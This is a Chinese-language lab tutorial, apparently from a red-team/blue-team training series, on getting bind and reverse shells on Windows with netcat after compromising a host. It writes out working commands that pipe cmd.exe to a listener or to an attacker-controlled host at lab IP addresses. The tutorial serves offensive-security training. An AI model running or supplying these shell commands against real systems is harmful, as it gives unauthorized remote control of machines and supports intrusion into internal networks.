《红蓝攻防对抗实战》六.常规反弹之利用NC在windows系统执行反弹shell
  4AFg6g0R0HXv 2023年11月19日 41 0


目录

一.利用NC工具在windows系统执行反弹shell

1. Windows正向连接shell

2.Windows反向连接shell


 前文推荐:


假设在内网环境中发现主机,通过漏洞获取到该主机控制权限,想要进一步对内网环境进行后续利用,这里可以通过反弹shell的方式去进行穿透,本次实验以nc工具为例来演示不同系统的操作,实验拓扑如图1-1所示。

一.利用NC工具在windows系统执行反弹shell

《红蓝攻防对抗实战》六.常规反弹之利用NC在windows系统执行反弹shell_windows


图1-1 windows系统下实验拓扑图

1. Windows正向连接shell

本次实验环境如图1-1所示,假设已经获取到目标服务器的系统权限,上传nc工具,使用正向连接反弹shell的方法将目标服务器的shell反弹到本地主机。

1)首先在目标服务器执行nc.exe -lvp 8888 -e cmd.exe命令监听8888端口,使用-e参数将cmd.exe程序反弹连接到此端口的服务,开启监听执行成功后如图1-2所示。

《红蓝攻防对抗实战》六.常规反弹之利用NC在windows系统执行反弹shell_流量监听_02


图1-2 服务器开启监听

2)目标服务器执行监听后,在本地主机执行nc.exe 192.168.0.3 8888命令去连接目标服务器nc开启监听的端口,连接成功即可获取到目标服务器的shell权限,如图1-3所示。

《红蓝攻防对抗实战》六.常规反弹之利用NC在windows系统执行反弹shell_反向连接_03


图1-3  windwos主机获取反弹shell

2.Windows反向连接shell

本次实验环境如图1-1所示,在目标服务器允许出网的情况下,在本地主机上获取到目标服务器的shell权限,可以尝试使用反向连接的方法。

1)首先在本地主机中使用nc工具开启监听,执行nc.exe -lvp 8888命令,如图1-4所示。

《红蓝攻防对抗实战》六.常规反弹之利用NC在windows系统执行反弹shell_windows_04


图1-4 windows主机开启服务端监听

2)当本地主机开启监听后,在目标服务器执行nc.exe 192.168.0.2 8888 -e cmd"命令主动连接本地主机的8888端口将cmd命令反弹到目标服务器,如图1-5所示

《红蓝攻防对抗实战》六.常规反弹之利用NC在windows系统执行反弹shell_NC_05


图1-5 服务器连接主机

3)此时当目标服务器访问我们的本地8888端口时,即可执行获取到目标服务器的Shell权限,使用Ipconfig命令查看获取到的反弹shell的IP,可查看到是目标服务器,如图1-6所示。

《红蓝攻防对抗实战》六.常规反弹之利用NC在windows系统执行反弹shell_NC_06


图1-6 获取服务器反弹shell的IP

【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载,内容版权归原作者所有。本网站的目的在于传递更多信息,不拥有版权,亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@moduyun.com

  1. 分享:
最后一次编辑于 2023年11月19日 0

暂无评论

推荐阅读
4AFg6g0R0HXv